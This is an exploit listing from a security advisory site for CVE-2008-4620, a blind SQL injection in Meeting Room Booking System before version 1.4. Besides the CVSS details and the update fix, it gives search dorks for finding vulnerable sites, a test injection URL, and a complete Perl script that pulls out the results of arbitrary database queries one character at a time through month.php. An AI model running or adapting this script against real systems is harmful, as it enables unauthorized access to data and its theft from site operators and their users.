Meeting Room Booking System (MRBS) < 1.4 SQL Injection Exploit

2008-10-21 / 2008-10-22
Credit: Xianur0
Risk: High
Local: No
Remote: Yes
CVE: CVE-2008-4620
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# "MRBS is a system for multi-site booking of meeting rooms. Rooms are grouped by building/area and shown in a side-by-side view. Although the goal was initially to book rooms, MRBS can also be used to book any resource (computer, planes, whatever you want)". # Web CMS: http://sourceforge.net/projects/mrbs/ # Affected: Previous versions of mrbs 1.4 # Solution: Update to Version 1.4 # Doorks: # "Meeting Room Booking System" "month.php?area=" # "Meeting Room Booking System" "day.php?area=" # "Meeting Room Booking System" "week.php?area=" # Author: Xianur0 # Try: http://www.sitio.com/path/month.php?area=1/**/and/**/1=0 # Exploit: #!/usr/bin/perl #Xianur0 CYS # perl blind.pl http://www.victima/st/schedule/ 'SELECT user()' # #Exploit MRBS By Xianur0 # #Please Have Patience, The Blind SQL Injection is running......... #pma@localhost # # #Finished! # # By Xianur0 use LWP::UserAgent; %ascii = ("32", " ","32", " ","33", "!","34", '"',"35", "#","36", '$',"37", "%","38", "&","39", "'","40", "(","41", ")","42", "*","43", "+","44", ",","45", "-","46", ".","47", "/","48", "0","49", "1","50", "2","51", "3","52", "4","53", "5","54", "6","55", "7","56", "8","57", "9","58", ":","59", ";","60", "<","61", "+","62", ">","63", "?","64", '@',"65","A","66","B","67","C","68","D","69","E","70","F","71","G","72","H","73","I","74","J","75","K","76","L","77","M","78","N","79","O","80","P","81","Q","82","R","83","S","84","T","85","U","86","V","87","W","88","X","89","Y","90","Z","95","_","97", "a", "98", "b", "99", "c", "100", ,"d","101","e", "102", "f", "103","g", "104", "h", "105","i", "106", "j", "107","k", "108", "l", "109","m", "110", "n", "111","o", "112", "p", "113","q", "114", "r", "115","s", "116", "t", "117","u", "118", "v", "119","w", "120", "x", "121","y", "122", "z"); $ua = LWP::UserAgent->new; $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17"); $url = $ARGV[0]; $sql = $ARGV[1] || die("Use: blind.pl [Complete URL] [SQL Injection]\nExample: blind.pl http://www.victima.com/mrbs/ 'SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES'\n"); print "\nExploit MRBS By Xianur0 \n\nPlease Have Patience, The Blind SQL Injection is running.........\n"; $caracter = 1; $i=0; $detector = '<h1>No rooms defined for this area</h1>'; $simbolo = ">"; while($caracter ne "finito") { $req = HTTP::Request->new(GET => $url.'/month.php?year=2008&month=08&area=1%20AND ascii(substring(('.$sql.'),'.$caracter.',1)) '.$simbolo.' '.$i); $req->header('Accept' => 'text/html'); $res = $ua->request($req); if ($res->is_success) { if($res->content !~ $detector) { if($base eq $i) { print "$ascii{$i}"; $caracter++; $i=0; $simbolo = ">";} $base = $i; $i = $i+10; } else { if($i eq 0) { print "\nError Performing Blind (Less Value to 0)!\n"; $caracter = "finito";} else {$i = $i-1; $simbolo = "=";} } } else { print "\nError detected in HTTP requests: " . $res->status_line . "!\n"; } } print "\nFinished!\n";

References:

http://www.securityfocus.com/bid/31809
http://www.milw0rm.com/exploits/6781


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top